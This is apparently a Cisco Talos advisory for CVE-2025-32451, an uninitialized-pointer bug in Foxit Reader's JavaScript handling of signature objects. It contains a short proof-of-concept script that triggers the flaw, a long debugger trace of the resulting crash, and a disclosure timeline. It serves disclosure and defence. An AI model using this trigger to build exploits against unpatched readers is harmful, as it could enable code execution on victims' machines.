CVE-2025-32451
A memory corruption vulnerability exists in Foxit Reader 2025.1.0.27937 due to the use of an uninitialized pointer. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2025.1.0.27937
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824 - Access of Uninitialized Pointer
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an uninitialized pointer vulnerability in the way Foxit Reader handles a signature object. This can be illustrated by the following proof-of-concept code:
function main() {
sig_info = app.activeDocs[0].getField("Signature_0").signatureInfo();
app.activeDocs[0].getField("Signature_0").setLock(true);
JSON.stringify(sig_info);
}
The above JavaScript code causes the creation of the CPDF_Signature object, and a field in the object is not initialized. Later, this uninitialized pointer field is accessed without any validation. This behavior can be observed in the debugger (with PageHeap enabled):
0:000> p
eax=07fce468 ebx=07fce600 ecx=00000000 edx=176e9708 esi=1598c788 edi=00000000
eip=01ca51a3 esp=07fce45c ebp=07fce474 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200282
FoxitPDFReader!safe_vsnprintf+0x648e3:
01ca51a3 6884000000 push 84h ;<-------------- (1)
0:000> p
eax=07fce468 ebx=07fce600 ecx=00000000 edx=176e9708 esi=1598c788 edi=00000000
eip=01ca51a8 esp=07fce45c ebp=07fce474 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200282
FoxitPDFReader!safe_vsnprintf+0x648e8:
01ca51a8 e883845000 call FoxitPDFReader!safe_vsnprintf+0x56cd70 (021ad630) ;<-------------- (2)
0:000> p
eax=120069e0 ebx=07fce600 ecx=28e21ca9 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51ad esp=07fce45c ebp=07fce474 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x648ed:
01ca51ad 83c404 add esp,4
0:000> dd eax ;<-------------- (3)
120069e0 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
120069f0 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a00 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a10 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a20 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a30 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a40 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a50 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
0:000> p
eax=120069e0 ebx=07fce600 ecx=28e21ca9 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51b0 esp=07fce460 ebp=07fce474 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200216
FoxitPDFReader!safe_vsnprintf+0x648f0:
01ca51b0 8945f0 mov dword ptr [ebp-10h],eax ss:002b:07fce464=00000000
0:000> pc
eax=120069e0 ebx=07fce600 ecx=120069e0 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51d2 esp=07fce458 ebp=07fce474 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x64912:
01ca51d2 e8d9bbe200 call FoxitPDFReader!safe_vsnprintf+0xe904f0 (02ad0db0) ;<-------------- (4)
0:000> dd 120069e0 ;<-------------- (5)
120069e0 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
120069f0 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a00 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a10 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a20 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a30 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a40 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a50 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
0:000> p
eax=120069e0 ebx=07fce600 ecx=cf654049 edx=00000009 esi=1598c788 edi=00000000
eip=01ca51d7 esp=07fce460 ebp=07fce474 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x64917:
01ca51d7 c745fcffffffff mov dword ptr [ebp-4],0FFFFFFFFh ss:002b:07fce470=00000000 ;<-------------- (6)
0:000> dd 120069e0
120069e0 058f5eac 00000000 176e9708 e0e0e0e0
120069f0 00007c18 00000000 15891b60 00000000
12006a00 00000000 00000000 00000000 00000000
12006a10 00000004 00000000 00000000 00000001
12006a20 00000000 00000000 00000000 00000000
12006a30 00000000 00000000 e0e0e000 00000000
12006a40 00000000 00000000 00000000 00000000
12006a50 00000000 00000000 00000000 00000000
At (2), the method is called, which eventually invokes malloc to allocate a vulnerable buffer. The size of the buffer is determined and passed at (1). The buffer’s content is examined at (3). Next, the buffer is passed to a method at (4) without any initialization. After the method call, it can be observed that the field at offset 0x0C is not initialized.
0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bb2 esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962f2:
02ad6bb2 c745cc08000000 mov dword ptr [ebp-34h],8 ss:002b:07fce46c=00000001
0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bb9 esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962f9:
02ad6bb9 7454 je FoxitPDFReader!safe_vsnprintf+0xe9634f (02ad6c0f) [br=0]
0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bbb esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962fb:
02ad6bbb 8d45c8 lea eax,[ebp-38h]
0:000> p
eax=07fce468 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bbe esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962fe:
02ad6bbe c7433401000100 mov dword ptr [ebx+34h],10001h ds:002b:15a19474=00000000
0:000> p
eax=07fce468 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc5 esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96305:
02ad6bc5 8b490c mov ecx,dword ptr [ecx+0Ch] ds:002b:120069ec=e0e0e0e0 ; <----------- (7)
0:000> p
eax=07fce468 ebx=15a19440 ecx=e0e0e0e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc8 esp=07fce450 ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96308:
02ad6bc8 50 push eax
0:000> p
eax=07fce468 ebx=15a19440 ecx=e0e0e0e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc9 esp=07fce44c ebp=07fce4a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96309:
02ad6bc9 e8421b34ff call FoxitPDFReader!safe_vsnprintf+0x1d7e50 (01e18710) ; <----------- (8)
Later, the uninitialized field is passed as the this object to the method called at (8). The following crash occurs when the uninitialized this object is dereferenced:
0:000> p
(b90.e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=e209bf3a ebx=15a19440 ecx=00000073 edx=00000000 esi=e0e0e0f0 edi=07fce468
eip=021b8e62 esp=07fce414 ebp=07fce41c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5785a2:
021b8e62 f77608 div eax,dword ptr [esi+8] ds:002b:e0e0e0f8=????????
0:000> u
FoxitPDFReader!safe_vsnprintf+0x5785a2:
021b8e62 f77608 div eax,dword ptr [esi+8]
021b8e65 8b450c mov eax,dword ptr [ebp+0Ch]
021b8e68 8910 mov dword ptr [eax],edx
021b8e6a 8b7604 mov esi,dword ptr [esi+4]
021b8e6d 85f6 test esi,esi
021b8e6f 7422 je FoxitPDFReader!safe_vsnprintf+0x5785d3 (021b8e93)
021b8e71 8b3496 mov esi,dword ptr [esi+edx*4]
021b8e74 85f6 test esi,esi
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 07fce41c 021b9460 07fce468 07fce42c e0e0e0f0 FoxitPDFReader!safe_vsnprintf+0x5785a2
01 07fce430 01e18723 07fce468 07fce440 e0e0e0e0 FoxitPDFReader!safe_vsnprintf+0x578ba0
02 07fce444 02ad6bce 07fce468 cf6540b9 1597aad0 FoxitPDFReader!safe_vsnprintf+0x1d7e63
03 07fce4a0 01caa57b 07fce6c0 6b5b440c 15a19440 FoxitPDFReader!safe_vsnprintf+0xe9630e
04 07fce4a8 6b5b440c 15a19440 96964da9 07fce7c8 FoxitPDFReader!safe_vsnprintf+0x69cbb
05 07fce6c0 6b5b5335 00000000 07fce73c 6b5b5335 Signature!PlugInMain+0x9b29c
06 07fce730 6b51e3fd 1598c788 07fce8c8 6b51e3fd Signature!PlugInMain+0x9c1c5
07 07fce83c 6b4e890a 177727e4 07fce8c8 969643e1 Signature!PlugInMain+0x528d
08 07fce888 0126bd6c 1247c2d8 176e9708 07fce8c8 Signature!AUILib::HyperLinkElement::~HyperLinkElement+0x2e46a
09 07fce8c0 02fb5750 15306b28 176e9708 07fce90c FoxitPDFReader!CryptUIWizExport+0x32ecc
0a 07fce8fc 02f9fb8b 1226e458 07fce91c 153060e0 FoxitPDFReader!safe_vsnprintf+0x1374e90
0b 07fce948 03286273 12273db8 07fce98c 1226e458 FoxitPDFReader!safe_vsnprintf+0x135f2cb
0c 07fce9a4 032ff3c3 14e07658 13036000 07fceac8 FoxitPDFReader!FXJSE_GetClass+0x4b3
0d 07fcea74 032feef0 07fceab4 07fceac8 14e073f0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x78b53
0e 07fceaa8 0344a76d 07fceb0c 00fceac8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x78680
0f 07fceb24 03446436 07fcf65c 07fcedd0 07fcec8c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c3efd
10 07fcec4c 0344ab80 07fcf65c 00000000 13036154 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1bfbc6
11 07fcec6c 03449470 07fcf5fc 07fcf65c 07fcf660 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4310
12 07fcf5d4 03526436 07fcf5fc 13036000 07fcf65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c2c00
13 07fcf604 03526beb 07fcf61c 00000008 07fcf664 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x29fbc6
14 07fcf620 0374e781 00000008 07fcf664 13036000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2a037b
15 07fcf640 036c5895 18b80039 226d4849 00000010 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c7f11
16 07fcf690 036c5895 226d23e9 226ec095 18b80039 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43f025
17 07fcf6bc 036c382d 226d23e9 18b80745 226ec1f9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43f025
18 07fcf6d4 036c3653 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43cfbd
19 07fcf708 032c789e 13036080 18b80039 226ec1f9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43cde3
1a 07fcf79c 032c746c 07fcf89c 13036000 07fcf7f4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4102e
1b 07fcf81c 032ad9fb 07fcf89c 13036000 14e07358 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40bfc
1c 07fcf8c4 032ad750 07fcf960 14e07370 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2718b
1d 07fcf8d8 032843f9 07fcf960 14e07370 cf655d49 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x26ee0
1e 07fcf950 03284da6 14e07358 17707f50 14e07340 FoxitPDFReader!FXJSE_Runtime_Release+0xff9
1f 07fcf98c 02ddd1a6 11d93098 116aabf4 17707f50 FoxitPDFReader!FXJSE_ExecuteScript+0x86
20 07fcf9f8 02dde0d0 00000000 07fcfa70 07fcfa3c FoxitPDFReader!safe_vsnprintf+0x119c8e6
21 07fcfa0c 02f38995 07fcfa70 07fcfa3c cf655e2d FoxitPDFReader!safe_vsnprintf+0x119d810
22 07fcfa34 02f38a9c 00000000 07fcfa70 cf655e71 FoxitPDFReader!safe_vsnprintf+0x12f80d5
23 07fcfa68 02de03d0 1776aed0 00000113 07fcfa8c FoxitPDFReader!safe_vsnprintf+0x12f81dc
24 07fcfa78 0124fbf7 00000113 0000593a 055c3ce8 FoxitPDFReader!safe_vsnprintf+0x119fb10
25 07fcfa8c 75a4171b 00000000 00000113 0000593a FoxitPDFReader!CryptUIWizExport+0x16d57
26 07fcfab8 75a34274 0124fbe0 00000000 00000113 USER32!_InternalCallWinProc+0x2b
27 07fcfb88 75a364fb 0124fbe0 00000000 00000113 USER32!UserCallWinProc+0x143
28 07fcfbfc 75a362e0 00000013 07fcfc24 00b46120 USER32!DispatchMessageWorker+0x20b
29 07fcfc08 00b46120 0d1c9118 0d1c9118 0649e830 USER32!DispatchMessageW+0x10
2a 07fcfc24 00b461d3 0649e830 00b46140 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1c3890
2b 07fcfc44 04d0cdaa 00000000 00000001 080e4000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1c3943
2c 07fcfc5c 04abae48 00770000 00000000 0d165144 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa04d8a
2d 07fcfca8 750bfcc9 080e4000 750bfcb0 07fcfd14 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7b2e28
2e 07fcfcb8 7728809e 080e4000 1c99cca1 00000000 KERNEL32!BaseThreadInitThunk+0x19
2f 07fcfd14 7728806e ffffffff 772a911e 00000000 ntdll!__RtlUserThreadStart+0x2f
30 07fcfd24 00000000 04abaf23 080e4000 00000000 ntdll!_RtlUserThreadStart+0x1b
By carefully controlling allocations and deallocations that happen before the vulnerability is triggered, an exploit could gain control over the uninitialized memory which can lead to further memory corruption and potentially arbitrary code execution.
2025-06-02 - Vendor Disclosure
2025-08-13 - Vendor Patch Release
2025-08-13 - Public Release
Discovered by KPC of Cisco Talos.